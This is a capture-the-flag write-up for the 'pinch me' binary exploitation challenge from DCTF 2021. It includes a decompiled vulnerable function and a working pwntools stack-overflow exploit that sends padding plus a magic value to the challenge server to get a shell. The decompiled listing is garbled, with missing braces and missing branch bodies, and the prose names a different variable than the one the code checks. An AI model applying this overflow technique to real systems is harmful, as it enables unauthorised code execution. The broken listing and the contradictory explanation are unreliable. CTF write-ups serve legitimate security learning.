Tags: pwn 



We got a binary file which asked us ```Am I dreaming?``` and with basic input prints then ```Pinch me!```


Loading the binary into *ghidra* we can see, that the interaction happens in the function ```vuln```

void vuln(void)

char local_28 [24];
int local_10;
int local_c;

local_c = 0x1234567;
local_10 = -0x76543211;
puts("Is this a real life, or is it just a fanta sea?");
puts("Am I dreaming?");
if (local_10 == 0x1337c0de) {
else {
if (local_c == 0x1234567) {
puts("Pinch me!");
else {
puts("Pinch me harder!");

Based on this, overwriting the local_c variable with ```0x1337c0de``` gives me a shell.

This was pretty easy, I only needed to be careful to use the correct endianess.
Pwntools provides a function to pack correctly.

My final exploit was.

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"

context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './pinch_me'

#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)

p.readuntil('Am I dreaming?')

p.sendline(b'\x41'*24 + p64(0x1337c0de))

#p.readuntil('will this work')
p.read( 2048, timeout=1 ) # cleanup output

Then I just needed to print the file ```flag.txt```

The flag was:


Original writeup (https://w0y.at/writeup/2021/05/17/dctf-2021-pinch-me.html).